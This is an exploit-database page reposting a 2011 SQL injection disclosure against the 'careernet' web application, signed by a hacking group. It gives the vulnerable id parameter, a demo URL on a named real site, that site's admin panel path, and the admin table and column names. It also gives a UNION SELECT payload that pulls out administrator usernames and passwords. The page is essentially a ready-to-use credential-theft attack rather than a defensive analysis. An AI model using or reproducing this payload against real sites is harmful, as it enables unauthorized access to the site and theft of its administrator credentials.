Careernet SQL Injection

2011.08.10
Credit: skote_vahshat
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _\/\ _`\ /\ \/\ \ | |* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } | |* \ \ \ \ \ _ <'\ \ _ \ | |* \ \ \ \ \ \L\ \\ \ \ \ \ | |* \ \_\ \ \____/ \ \_\ \_\ | |* \/_/ \/___/ \/_/\/_/ | |* | |* | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ======================================================================= \* [Title] :[ careernet sql injection vulnerability] /* \* [Author] :[skote_vahshat] /* \* [Home] :[Http://Skote-Vahshat.com] /* \* [Archive] :[Http://xpl.skote-vahshat.com] /* \* [Email] :[skote.vahshat@Gmail.Com] /* ======================================================================= /* Web Server: Apache /*DB Server: MySQL >=5 /* [+]Exploit : /* http://www.target.com/index.php?id=[SQLi] /* [+]Demo: /* http://blog.careernet.co.in/index.php?id=1[SQLi] /* [+]admin page /* http://careernet.co.in/cp/ /* [+] talbe admin (blog_user) /* [+] column ( blog_user_username , blog_user_password) /* [+] +union+select+1,blog_user_username,blog_user_password,4,5,6,7+from+blog_user ======================================================================= |_***_| spical thanks : bl4ck.viper all turkiS hackers| =======================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top